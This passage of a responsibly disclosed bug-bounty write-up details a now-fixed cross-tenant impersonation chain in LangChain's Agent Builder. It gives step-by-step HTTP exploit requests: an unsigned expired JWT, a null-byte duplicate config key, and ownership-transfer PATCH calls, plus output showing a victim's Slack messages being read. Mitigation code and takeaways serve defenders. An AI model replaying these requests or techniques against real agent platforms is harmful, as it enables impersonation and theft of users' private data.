One final piece is that Agent Builder accepts `agent_builder_passthrough_headers` either as a string with encrypted headers or as a dictionary of raw headers. Raw header support gives full control over the headers used during initialisation.

## Almost There...

Putting together all these details, the attack consists of the following steps:

1. An attacker adds an MCP server with:
   * URL set to `https://[eu.]tools.langchain.com/mcp`.
   * `X-Service-Key` header set to an unsigned JWT with an expired timestamp in the `exp` claim.
   * `X-Tenant-Id` header set to the victim's tenant ID.
2. An attacker creates a run with an overwritten `langgraph_auth_user` where:
   * `identity`, `tenant_id` and `ls_user_id` are set to the victim's user and tenant IDs.
   * `agent_builder_passthrough_headers` contains:
     * an `Authorization` header with a valid token of the attacker.
     * an `X-Tenant-Id` header with the attacker's tenant ID.
3. Agent Builder saves the run to the database, and a worker picks it up for execution.
4. The worker initialises the global context using the overwritten `langgraph_auth_user`, sets the victim as the current user, and starts graph execution.
5. Agent Builder uses `Authorization` during agent initialisation to retrieve the necessary resources.
6. Agent Builder adds the `X-Service-Key` and `X-Tenant-Id` headers from step 1 to `ServiceKeyAuth` during tool loading.
7. `ServiceKeyAuth` checks the `exp` claim in `X-Service-Key`, generates a new service key scoped for the victim, and assigns it to `X-Service-Key`.
8. Any further requests to the default MCP are sent with an `X-Service-Key` scoped for the victim, giving the attacker full access to the third-party integrations the victim established earlier.
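
The flaw exploited in step 7 can be sketched in a few lines. This is an illustrative reconstruction, not the actual `ServiceKeyAuth` code; the point is that the `exp` claim is read straight out of the payload segment without any signature check, so a completely unsigned token drives the refresh decision:

```python
import base64
import json

def _unverified_claims(token: str) -> dict:
    """Decode JWT claims WITHOUT checking the signature (the vulnerable step)."""
    payload_b64 = token.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))

def needs_refresh(service_key: str, now: float, leeway: float = 60) -> bool:
    """Illustrative refresh check: trusts `exp` from an unverified payload."""
    return _unverified_claims(service_key)["exp"] <= now + leeway

# The attacker's unsigned `.payload.` token is treated as an expired key,
# triggering generation of a real, signed key for whichever identity the
# surrounding headers specify
assert needs_refresh(".eyJleHAiOjE3NzAzNjU5ODd9.", now=1_770_400_000)
```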

To reproduce this behaviour, I created an agent with access to the `read_url_content` tool and created a run with the following message: "read content from <https://foo.site> and write a summary here". When the run completed, I saw that the agent had failed to use the tool, returning the following error:

> Error: read\_url\_content is not a valid tool, try one of \[write\_todos, ls, read\_file, write\_file, edit\_file, glob, grep, execute, task, message\_user, RequestMissingTools].

After spending some time debugging and understanding the error, I came to the conclusion that the tool was not registered for the agent. In other words, the agent did not have a Python primitive to call the tool. I reviewed the initialisation process again and discovered a missing element. Available tools for the agent are stored on the agent's filesystem (i.e. in long-term memory), and loading the tools requires access to the store backend. If the process can't access the store backend, it can't retrieve the available tools and can't register them for the agent. This indicated an authentication issue when accessing the store backend.

The following code was responsible for accessing the store backend:

```python
namespace = (assistant_id, "filesystem")
items = await get_loopback_client().store.search_items(namespace, headers=headers)
```

The `headers` variable here contains headers from the `agent_builder_passthrough_headers` field, including the attacker's `Authorization` header, but access is still denied. The reason is `get_loopback_client()`, which returns a loopback client for local in-process connections to the Agent Server API. Agent Server treats requests from this client differently and skips authentication for them entirely. Instead, it picks up the current user from the global context, which is set to the victim. In other words, the agent tries to access the filesystem of the attacker's assistant as the victim user. Since the victim has no access to the assistant, the agent fails to register tools. For successful exploitation, the victim user must have access to the assistant.

## Broken Authorisation

At the beginning, I briefly described how access control is implemented on Agent Server and how `metadata` is used to keep information about a resource owner. Agent Builder uses the same mechanism for authorisation: it writes the owner's IDs into `metadata` during creation and checks them on subsequent access. For example, this handler is called when an assistant is created:

```python
@auth.on.assistants.create
async def on_assistants_create(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.create.value,
):
    # ...
    metadata = value.setdefault("metadata", {})
    # ...
    metadata["ls_user_id"] = ctx.user.ls_user_id
    metadata["tenant_id"] = ctx.user.tenant_id
    # ...
```

The next handler is called when an assistant is deleted or updated:

```python
@auth.on.assistants.delete
@auth.on.assistants.update
async def on_assistants_write(
    ctx: Auth.types.AuthContext,
    value: Auth.types.on.assistants.delete.value,
):
    # ...
    return {"ls_user_id": ctx.user.ls_user_id, "tenant_id": ctx.user.tenant_id}
```

This guarantees that a user can only delete or update assistants whose `metadata` contains their own `ls_user_id` and `tenant_id`. However, the delete and update handler does not check that the `metadata` passed in the request leaves `ls_user_id` and `tenant_id` intact. As a result, an attacker can create an assistant and then change its ownership to a victim.
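
A minimal mitigation sketch (hypothetical helper, not the fix LangChain actually shipped) is to strip owner-identifying keys from client-supplied metadata before an update is applied:

```python
# Keys that identify the resource owner and must never come from the client
PROTECTED_METADATA_KEYS = {"ls_user_id", "tenant_id"}

def sanitise_update_metadata(value: dict) -> dict:
    """Drop owner-identifying keys from client-supplied metadata so that an
    update request can never transfer ownership of an assistant."""
    metadata = value.get("metadata")
    if isinstance(metadata, dict):
        for key in PROTECTED_METADATA_KEYS:
            metadata.pop(key, None)
    return value

request = {"metadata": {"tenant_id": "<victim>", "ls_user_id": "<victim>", "note": "x"}}
sanitise_update_metadata(request)
print(request)  # {'metadata': {'note': 'x'}}
```

Rejecting the request outright instead of silently dropping the keys would work equally well and makes tampering attempts visible in logs.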

## Exploitation

Finally, all the pieces can be assembled to demonstrate the attack. For the exploitation, I added a Slack integration for a victim user. My goal was to gain access to the victim's Slack channel and verify that the attacker could use the victim's configured third-party integrations. It's worth noting that the only prerequisite for the attack is knowledge of the victim's user and tenant IDs.

Here are the exploitation steps:

1. Create an assistant in the attacker's tenant and get `assistant_id` from the response:

   ```http
   POST /assistants HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   Content-Type: application/json
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "graph_id": "deep_agent",
       "config": {
           "configurable": {
               "configurable": {
                   "tools_url": "https://eu.tools.langchain.com",
                   "llm_model_config": {
                       "modelId": "anthropic:claude-sonnet-4-5",
                       "envVarName": "AGENT_BUILDER_ANTHROPIC_API_KEY"
                   }
               }
           }
       },
       "metadata": {},
       "name": "Support Agent",
       "description": ""
   }
   ```

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json

   {
       "assistant_id":"6f60ff77-fe98-46de-b9a6-05961fc2e238",
       ...
   }
   ```
2. Create a thread and get `thread_id` from the response:

   ```http
   POST /threads HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "is_test_run":true,
           "skip_memory_write_protection":true
       }
   }
   ```

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json

   {
       "thread_id":"6c65e2f0-56c4-41b6-a5d8-b2414fe3df27",
       ...
   }
   ```
3. Add an MCP server:

   ```http
   POST /v1/platform/mcp-servers HTTP/1.1
   Host: eu.api.smith.langchain.com
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "name": "eu_tools",
       "url": "https://eu.tools.langchain.com/mcp",
       "auth_type": "headers",
       "headers": [
           {
               "key": "X-Service-Key",
               "value": ".eyJleHAiOjE3NzAzNjU5ODd9."
           },
           {
               "key": "X-Tenant-Id",
               "value": "<victim_tenant_id>"
           }
       ]
   }
   ```

   In this request, `X-Service-Key` is set to `.eyJleHAiOjE3NzAzNjU5ODd9.`, which imitates a JWT whose payload is `{"exp":1770365987}` with a timestamp in the past. This forces `ServiceKeyAuth` to refresh the service key and generate a new, valid key for the victim. Meanwhile, `X-Tenant-Id` is set to the victim's tenant ID.
4. Create a run:

   ```http
   POST /threads/<thread_id>/runs/wait HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-agent
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "input": {
           "messages": [
               {
                   "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                   "type": "human",
                   "content": "read the last message for 24 hours in Slack <victim_slack_id> and write it here"
               }
           ]
       },
       "config": {
           "configurable": {},
           "configurable\u0000": {
               "tools_url": "https://eu.tools.langchain.com",
               "llm_model_config": {
                   "modelId": "anthropic:claude-sonnet-4-5",
                   "envVarName": "AGENT_BUILDER_ANTHROPIC_API_KEY"
               },
               "__after_seconds__": 10,
               "langgraph_auth_user": {
                   "identity": "<victim_user_id>",
                   "tenant_id": "<victim_tenant_id>",
                   "ls_user_id": "<victim_user_id>",
                   "permissions": [
                       "authenticated"
                   ],
                   "is_authenticated": true,
                   "agent_builder_passthrough_headers": {
                       "Authorization": "Bearer <auth_token>",
                       "X-Tenant-Id": "<tenant_id>"
                   }
               },
               "langgraph_auth_permissions": [
                   "authenticated"
               ],
               "skip_memory_write_protection": false
           }
       },
       "metadata": {
           "is_test_run": true,
           "skip_memory_write_protection": true,
       },
       "assistant_id": "<assistant_id>"
   }
   ```

   In this request, `langgraph_auth_user` is overwritten with the victim's user information (`victim_user_id` and `victim_tenant_id`), while `agent_builder_passthrough_headers` contains the attacker's token and tenant ID. Another important argument is `__after_seconds__`, which postpones execution by 10 seconds, leaving enough time to transfer ownership of the assistant and thread in the next step before the worker starts the run.
5. Update the ownership for the assistant and thread:

   ```http
   PATCH /assistants/<assistant_id> HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "tenant_id":"<victim_tenant_id>",
           "ls_user_id":"<victim_user_id>"
       }
   }
   ```

   ```http
   PATCH /threads/<thread_id> HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "tenant_id":"<victim_tenant_id>",
           "ls_user_id":"<victim_user_id>"
       }
   }
   ```
6. Wait for the run to complete and observe that the messages were successfully extracted from the victim's Slack:

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json
   Location: /threads/<thread_id>/runs/<run_id>/join
   Content-location: /threads/<thread_id>/runs/<run_id>
   Content-Length: 3839

   {
       "messages": [
           {
               "content": "read the last message for 24 hours in Slack <victim_slack_id> and write it here",
               "type": "human",
               // ...
           },
           {
               "content": [
                   {
                       "text": "I'll read the last 24 hours of messages from that Slack channel for you.",
                       "type": "text"
                   },
                   {
                       "id": "toolu_017dNU8ooEdmEgipMvz8TyYE",
                       "input": {
                           "channel_id": "<victim_slack_id>",
                           // ...
                       },
                       "name": "slack_read_channel_history",
                       "type": "tool_use"
                   }
               ],
               "tool_calls": [
                   {
                       "name": "slack_read_channel_history",
                       "args": {
                           "channel_id": "<victim_slack_id>",
                           // ...
                       },
                       "id": "toolu_017dNU8ooEdmEgipMvz8TyYE",
                       "type": "tool_call"
                   }
               ],
               // ...
           },
           {
               "content": "{\"success\": true, \"channel_id\": \"<victim_slack_id>\", \"message_count\": 2, \"messages\": [{\"content\": \"<@U0A7NTSGPB6> has joined the channel\", \"sender\": \"LangSmith Agent Builder\", \"timestamp\": \"2026-02-06T08:54:02.600079\", \"message_ts\": \"1770368042.600079\", \"thread_ts\": \"1770368042.600079\", \"has_thread_replies\": false, \"reply_count\": 0}, {\"content\": \"Hello, world!\", \"sender\": \"0xn3va\", \"timestamp\": \"2026-02-06T08:54:18.586009\", \"message_ts\": \"1770368058.586009\", \"thread_ts\": \"1770368058.586009\", \"has_thread_replies\": false, \"reply_count\": 0}]}",
               "type": "tool",
               "name": "slack_read_channel_history",
               // ...
           },
           {
               "content": "Here are the messages from the last 24 hours in Slack channel <victim_slack_id>:\n\n1. **LangSmith Agent Builder** (Feb 6, 2026 at 8:54:02 AM):\n   - \"@LangSmith Agent Builder has joined the channel\"\n\n2. **0xn3va** (Feb 6, 2026 at 8:54:18 AM):\n   - \"Hello, world!\"\n\nThere were 2 messages total in the last 24 hours. The most recent message was \"Hello, world!\" from user 0xn3va.",
               "type": "ai",
               // ...
           }
       ],
       "tools": []
   }
   ```

## The Impact

An attacker with knowledge of a victim's user and tenant IDs could run an AI agent on behalf of that user without any interaction or consent from the victim. Beyond impersonation itself, the attacker could gain access to any third-party services the victim had previously connected to Agent Builder — such as Slack, Gmail, Google Calendar, or GitHub. This meant reading private messages and emails, accessing calendar events, or interacting with code repositories, all under the victim's identity. The breadth of exposure depended entirely on which integrations the victim had configured.

## Takeaways

**Loose input validation expands attack surface.** When an API accepts and persists fields beyond those it explicitly needs, an attacker gains a surface to inject data that influences later processing. Here, Agent Server did not validate the run configuration against a strict schema, so a null-byte-suffixed key could be passed alongside the legitimate one. After serialisation stripped the null byte, PostgreSQL received duplicate keys and resolved them in the attacker's favour, overwriting a field that was never meant to be user-controllable.

**Changing serialised data can lead to unexpected side-effects.** Transforming or stripping characters from data mid-pipeline can produce outputs that differ structurally from the original input. In this case, removing null bytes during JSON serialisation caused a crafted key to become a duplicate of a protected one.
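
This side effect is easy to reproduce with the standard library alone. The snippet below simulates a storage pipeline that strips null-byte escapes after serialisation (the real pipeline is internal to Agent Server and PostgreSQL; this is only a model of the behaviour):

```python
import json

# Two distinct keys: the second carries a trailing null byte
config = {
    "configurable": {"owner": "server"},
    "configurable\x00": {"owner": "attacker"},
}

serialised = json.dumps(config)              # the null byte is escaped as \u0000
stored = serialised.replace("\\u0000", "")   # simulate stripping null bytes mid-pipeline

# The stored document now contains two identical keys; Python's parser
# (like PostgreSQL's jsonb) keeps the last occurrence, so the attacker wins
print(json.loads(stored)["configurable"])  # {'owner': 'attacker'}
```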

**Skipping JWT signature verification makes token claims untrustworthy.** The service key refresh logic decoded the `exp` claim from the JWT payload without verifying the signature. Any value with a valid-looking structure was accepted, meaning an attacker could supply a completely unsigned token with an arbitrary expiration time to trigger regeneration of a real, signed key scoped to any user.
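
For contrast, verifying an HS256 signature before trusting any claim takes only a few lines of standard-library code; the sketch below (a real service would use a maintained library such as PyJWT) rejects the unsigned token from this attack before `exp` is ever read:

```python
import base64
import hashlib
import hmac
import json

def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def decode_verified(token: str, secret: bytes) -> dict:
    """Return JWT claims only if the HS256 signature is valid."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("invalid signature")
    return json.loads(_b64url_decode(payload_b64))

# The attacker's signature-less token is rejected outright
try:
    decode_verified(".eyJleHAiOjE3NzAzNjU5ODd9.", b"server-secret")
except ValueError as err:
    print(err)  # invalid signature
```

Note that a production implementation must also pin the expected algorithm from the JWT header to avoid `alg` confusion attacks; the sketch above omits that check for brevity.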

**Excessive access amplifies the blast radius.** When a component is granted more access than it strictly requires, a vulnerability affecting that component exposes far more than it should. Here, integrations were tied to a user account rather than to individual agents, so impersonating a victim automatically granted access to every service they had ever connected, regardless of its relevance to the agent being executed.

## Disclosure Timeline

* 06/02/26 - Initial report sent to the LangChain team.
* 06/02/26 - Fix was applied.
* 07/03/26 - Bounty awarded.

